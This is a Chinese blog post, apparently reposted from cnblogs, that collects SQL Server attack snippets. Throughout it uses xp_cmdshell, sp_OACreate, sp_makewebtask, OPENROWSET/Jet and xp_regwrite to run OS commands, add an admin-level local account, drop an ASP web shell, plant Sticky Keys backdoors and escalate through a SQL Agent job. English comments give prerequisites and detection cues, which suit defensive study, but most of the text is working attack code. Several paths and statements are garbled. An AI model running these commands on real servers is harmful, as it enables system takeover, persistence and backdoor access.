  • SQL 不常用的一些命令sp_OACreate,xp_cmdshell,sp_makewebtask

    • 开启和关闭xp_cmdshell
    •  
      -- Enabling xp_cmdshell gives every sysadmin login OS command execution as the SQL Server
      -- service account; keep it at 0 unless a documented process needs it. Changing any
      -- sp_configure option requires the ALTER SETTINGS permission (sysadmin/serveradmin by
      -- default) and SQL Server writes "Configuration option 'xp_cmdshell' changed from 0 to 1"
      -- to the error log -- a cheap, reliable thing to alert on.
      EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- enable xp_cmdshell
    •  
      EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;-- disable xp_cmdshell
    •  
      -- NOTE: GO is a client-side batch separator (sqlcmd/SSMS), not T-SQL, and must stand on a
      -- line of its own; placed mid-line as here the batch does not parse. The trailing Chinese
      -- text ("disable advanced options") is page prose that was fused onto the statement.
      EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
    •  
      2.
    •  
      xp_cmdshell执行命令
    •  
      -- Runs 'ipconfig' through the OS shell and returns its output as a result set. For sysadmin
      -- callers the process runs as the SQL Server service account; other callers use the
      -- xp_cmdshell proxy account. Any execution of master..xp_cmdshell is worth auditing
      -- (Extended Events / SQL Audit), and cmd.exe spawned by sqlservr.exe is a high-signal EDR event.
      EXEC master..xp_cmdshell 'ipconfig'
    •  
      3.
    •  
      开启和关闭sp_oacreate
    •  
      -- 'Ole Automation Procedures' switches on sp_OACreate/sp_OAMethod, i.e. instantiation of
      -- arbitrary COM objects inside the SQL Server process; every sp_oacreate snippet on this page
      -- depends on it. It is off by default, and leaving it on is equivalent to handing OS-level
      -- execution to sysadmin. Like all sp_configure changes it needs ALTER SETTINGS and is logged
      -- in the SQL Server error log. The trailing "开启"/"关毕" ("enable"/"disable") are page prose,
      -- not SQL, so these lines do not parse as shown.
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; 开启
    •  
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE; 关毕
    •  
      -- GO is a client batch separator and must be on its own line; mid-line it is a syntax error.
      EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
    •  
      4.
    •  
      sp_OACreate删除文件
    •  
      -- Deletes a file through the Scripting.FileSystemObject COM object. sp_OACreate requires
      -- sysadmin (or explicit EXECUTE on the procedure) plus 'Ole Automation Procedures' = 1.
      -- The path literal lost its backslashes in extraction; from the Chinese segment it pointed at
      -- a .bat in the all-users Start Menu\Programs\Startup folder, so this is cleanup of a
      -- persistence artefact rather than routine maintenance.
      DECLARE @Result int
    •  
      DECLARE @FSO_Token int
    •  
      EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT
    •  
      -- @Result (an HRESULT) is captured on every call but never tested, so a failed create or a
      -- missing file passes silently; sp_OAGetErrorInfo is the procedure that reads the error.
      EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile', NULL, 'C:Documents and SettingsAll Users「开始」菜单程序启动user.bat'
    •  
      -- Releases the COM object; without this the handle lives until the batch ends.
      EXEC @Result = sp_OADestroy @FSO_Token
    •  
      5.
    •  
      sp_OACreate复制文件
    •  
      -- Copies explorer.exe over sethc.exe, the Sticky Keys binary that Windows launches from the
      -- logon screen before authentication -- the classic "sticky keys" backdoor, here done from
      -- inside SQL Server. Same prerequisites as the sp_OACreate block above (sysadmin + Ole
      -- Automation Procedures). Windows File Protection / Windows Resource Protection is designed
      -- to revert or block writes to system32 binaries, and file-integrity monitoring on that
      -- directory should flag the change; no return code is checked here.
      declare @o int
    •  
      exec sp_oacreate 'scripting.filesystemobject', @o out
    •  
      -- Path separators were lost in extraction (c:windowsexplorer.exe etc.).
      exec sp_oamethod @o, 'copyfile',null,'c:windowsexplorer.exe' ,'c:windowssystem32sethc.exe';
    •  
      6.
    •  
      sp_OACreate移动文件
    •  
      -- Renames/moves a file with FileSystemObject.MoveFile; same prerequisites as the other
      -- sp_oacreate blocks. The literals here are garbled ("c: empipmi.log" has lost its
      -- separators) and the result of the call is not checked.
      declare @aa int
    •  
      exec sp_oacreate 'scripting.filesystemobject', @aa out
    •  
      exec sp_oamethod @aa, 'moveFile',null,'c: empipmi.log', 'c: empipmi1.log';
    •  
      7.
    •  
      sp_OACreate加管理员用户
    •  
      -- Hands a JScript string to a scripting-host COM object for Eval; the script creates a local
      -- account, sets its password and sets AccountType to 3 (an administrator-level account in
      -- the Shell.Users object model). Requires sysadmin and 'Ole Automation Procedures' = 1.
      -- On the database host this shows up as Security event 4720 (user account created) and,
      -- for group changes, 4732 -- both should be rare enough on a DB server to alert on.
      DECLARE @js int
    •  
      EXEC sp_OACreate 'ScriptControl',@js OUT
    •  
      EXEC sp_OASetProperty @js, 'Language', 'JavaScript'
    •  
      -- No HRESULT or error info is checked, so failure (e.g. object unavailable) is silent.
      EXEC sp_OAMethod @js, 'Eval', NULL, 'var o=new ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'
    •  
      8.
    •  
      开启和关闭sp_makewebtask
    •  
      -- 'Web Assistant Procedures' enables sp_makewebtask and friends, which write the output of
      -- a query to a file on the server. The feature was deprecated in SQL Server 2005 and removed
      -- in 2008, so on any supported version these lines simply error; on legacy servers keep it
      -- off. The trailing "开启"/"关毕" are page prose ("enable"/"disable"), not SQL.
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE; 开启
    •  
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',0;RECONFIGURE; 关毕
    •  
      -- GO is a client batch separator and must be on its own line; mid-line it is a syntax error.
      EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
    •  
      9.
    •  
      sp_makewebtask新建文件
    •  
      -- Uses the Web Assistant to write a file whose content is a one-line server-side script
      -- that executes whatever arrives in a request parameter -- i.e. it drops a web shell, which
      -- only works if the path lands under a web root. Requires 'Web Assistant Procedures' = 1
      -- (removed in SQL Server 2008+). Any sp_makewebtask call on a server that still has it
      -- should be treated as a high-severity event. Output path lost its separators in extraction;
      -- the trailing ';;--' is leftover injection syntax, not part of the procedure.
      exec sp_makewebtask 'c:windows.txt',' select ''<%25execute(request("a"))%25>'' ';;--
    •  
      10.
    •  
      wscript.shell执行命令
    •  
      -- Runs a shell command via WScript.Shell.Run. Run returns only an exit code, which is why
      -- the command's output is redirected to a file (path garbled: "c: est.tmp"). Same
      -- prerequisites as the other sp_oacreate blocks; cmd.exe/wscript spawned with sqlservr.exe
      -- as parent is a high-signal EDR detection regardless of which COM object is used.
      use master
    •  
      declare @o int
    •  
      exec sp_oacreate 'wscript.shell',@o out
    •  
      exec sp_oamethod @o,'run',null,'cmd /c "net user" > c: est.tmp'
    •  
      11.
    •  
      Shell.Application执行命令
    •  
      -- Same idea as the wscript.shell block, using Shell.Application.ShellExecute instead: the
      -- command output is redirected to a file because the method itself returns nothing useful.
      -- Prerequisites: sysadmin + 'Ole Automation Procedures' = 1. Paths are garbled by extraction.
      declare @o int
    •  
      exec sp_oacreate 'Shell.Application', @o out
    •  
      exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user >c: est.txt','c:windowssystem32','','1';
    •  
      or
    •  
      -- Alternative: launch a script file from c:\ through the same @o handle. Depends on the
      -- sp_oacreate 'Shell.Application' call above having run in the same batch; the script
      -- file itself is not shown on this page.
      exec sp_oamethod @o, 'ShellExecute',null, 'user.vbs','','c:','','1';
    •  
      12.
    •  
      开启和关闭openrowset
    •  
      -- 'Ad Hoc Distributed Queries' allows OPENROWSET/OPENDATASOURCE with an inline connection
      -- string, which is what the Jet "shell()" trick below relies on. Off by default; keep it
      -- off and use linked servers for legitimate cross-source queries. The trailing
      -- "开启"/"关毕" are page prose ("enable"/"disable"), not SQL.
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; 开启
    •  
      exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',0;RECONFIGURE; 关毕
    •  
      -- GO is a client batch separator and must be on its own line; mid-line it is a syntax error.
      EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
    •  
      13.
    •  
      沙盒执行命令
    •  
      -- xp_regwrite (sysadmin only) lowers the Jet 4.0 engine's SandBoxMode from its default of 3
      -- to 1, after which Jet expressions are allowed to call unsafe VBA functions such as
      -- shell(). The registry path lost its backslashes in extraction; the trailing "默认为3"
      -- ("default is 3") is prose, not SQL. Any xp_regwrite call is worth alerting on.
      exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1 默认为3
    •  
      -- OPENROWSET opens an Access/Jet .mdb (an ias.mdb shipped with Windows is used here) and the
      -- Jet engine evaluates shell(...) while parsing the query, executing the command inside the
      -- SQL Server process. Needs 'Ad Hoc Distributed Queries' = 1 and the Jet 4.0 provider,
      -- which is 32-bit only and therefore unavailable to a 64-bit SQL Server. Paths are garbled.
      select * from openrowset('microsoft.jet.oledb.4.0',';database=c:windowssystem32iasias.mdb','select shell("cmd.exe /c echo a>c:.txt")')
    •  
      14.
    •  
      注册表劫持粘贴键
    •  
      -- Sets the Image File Execution Options "Debugger" value for sethc.exe so that Windows
      -- starts explorer.exe whenever Sticky Keys is invoked -- the same logon-screen backdoor as
      -- the copyfile blocks, achieved with one registry write and no file tampering. Requires
      -- sysadmin for xp_regwrite. The key path is split over two lines and lost its backslashes.
      -- A Debugger value under IFEO for sethc.exe is essentially never legitimate: monitor
      -- registry value writes to IFEO (Sysmon event 13, or Security 4657 with a SACL on the key).
      exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsNTCurrentVersionImage File Execution
    •  
      Optionssethc.EXE','Debugger','REG_SZ','C:WINDOWSexplorer.exe';
    •  
      15.
    •  
      sp_oacreate替换粘贴键
    •  
      -- Sticky Keys replacement in two steps: copy explorer.exe over sethc.exe, then copy the
      -- tampered sethc.exe into dllcache -- the Windows File Protection cache on XP/2003 -- so
      -- that WFP "restores" the backdoored copy instead of the original. Prerequisites as for the
      -- other sp_oacreate blocks. Paths are garbled by extraction and no return codes are checked.
      declare @o int
    •  
      exec sp_oacreate 'scripting.filesystemobject', @o out
    •  
      exec sp_oamethod @o, 'copyfile',null,'c:windowsexplorer.exe' ,'c:windowssystem32sethc.exe';
    •  
      declare @oo int
    •  
      -- Two statements on one line with no separator; T-SQL tolerates this, but it is easy to misread.
      exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:windowssystem32sethc.exe' ,'c:windowssystem32dllcachesethc.exe';
    •  
      16.
    •  
      public权限提权操作
    •  
      -- Creates, targets and immediately starts a SQL Agent job whose single T-SQL step calls
      -- xp_cmdshell -- the SQL Server 2000-era escalation where any login could add a job in
      -- msdb and have it run under the Agent service account. On SQL Server 2005+ sp_add_job
      -- requires one of the msdb SQLAgent*Role roles, T-SQL steps of jobs owned by non-sysadmin
      -- logins run in the owner's context, and xp_execresultset no longer exists, so this mostly
      -- documents a legacy path. Still worth hunting for: jobs created by non-DBA logins and
      -- Agent job steps that invoke xp_cmdshell.
      USE msdb
    •  
      -- "www.2cto.com" at the end of this line is stray text from the source page, not T-SQL.
      EXEC sp_add_job @job_name = 'GetSystemOnSQL', www.2cto.com
    •  
      @enabled = 1,
    •  
      @description = 'This will give a low privileged user access to
    •  
      xp_cmdshell',
    •  
      -- @delete_level = 1 deletes the job once it succeeds, removing it from sysjobs and its
      -- history; the SQL Agent log (SQLAGENT.OUT) is where the start/finish still leaves a trace.
      @delete_level = 1
    •  
      EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
    •  
      @step_name = 'Exec my sql',
    •  
      @subsystem = 'TSQL',
    •  
      -- Nested quoting: the step runs xp_execresultset, which in turn executes the result of the
      -- inner SELECT, i.e. the xp_cmdshell call. Output path is garbled by extraction.
      @command = 'exec master..xp_execresultset N''select ''''exec
    •  
      master..xp_cmdshell "dir > c:agent-job-results.txt"'''''',N''Master'''
    •  
      -- 'SERVER_NAME' is a placeholder; sp_add_jobserver needs the actual local server name.
      EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
    •  
      @server_name = 'SERVER_NAME'

    • EXEC sp_start_job @job_name = 'GetSystemOnSQL'
    •  


  • 原文地址:https://www.cnblogs.com/linjincheng/p/9728853.html